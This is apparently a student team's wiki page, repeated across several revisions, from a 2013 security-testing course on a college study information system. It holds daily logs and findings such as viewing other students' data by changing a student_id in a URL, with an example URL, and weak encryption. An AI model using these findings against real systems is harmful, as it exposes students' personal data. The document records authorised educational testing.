* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feed-back==
===Feedback from Sten Aus===

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-05T06:10:12Z

Saus: /* Materials (slides etc) */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''

'''Problems what we faced:'''

'''Things what we plan to do:'''

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How do do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** Googeled a lot

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** We made the presentation structure together.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).
** Searched for security holes in OIS student information site.
** Used DVWA tool to test sql injections and xss scripting.
** Tried some sql injections and xss scripting on OIS page
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates
** Prepared some slides for the main presentation

* '''What have I learned:'''
** Theory about OWASP TOP 10 threats
** How to do sql injections
** How to use Firefox tamperdata tool
** How to do cross-site scripting
** Completely understood what is use case and how to draw them
** How to monitor activities with Wireshark
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8

====Jurij Lukjančikov====
* '''What I did:'''
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])
** I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])
** XSS and injection attacks to SIS

* '''What have I learned:'''
** I have learned about security breaches on the web.
** I have tried different parts of web for vulnerabilities and injection.
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).

===Final documentation===
====Analysis====

====Solution====

==IP Feed-back==
===Feedback from Sten Aus===

===Feedback from Matis Palm===

===Feedback from Sandra Suviste===

===Feedback from Markus Rintamäki===

===Feedback from Tomas Lepistö===

===Feedback from Mika Salmela===

===Feedback from Kęstutis Tautvydas===

===Feedback from Jurij Lukjančikov===

Security

2013-04-05T06:09:15Z

Saus: /* Materials (slides etc) */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''

'''Problems what we faced:'''

'''Things what we plan to do:'''

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf]] Presentation slides (Made by whole team, structure by Sandra and Jurij)'''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360 (Team Security starts from 18:30)]'''

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How do do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
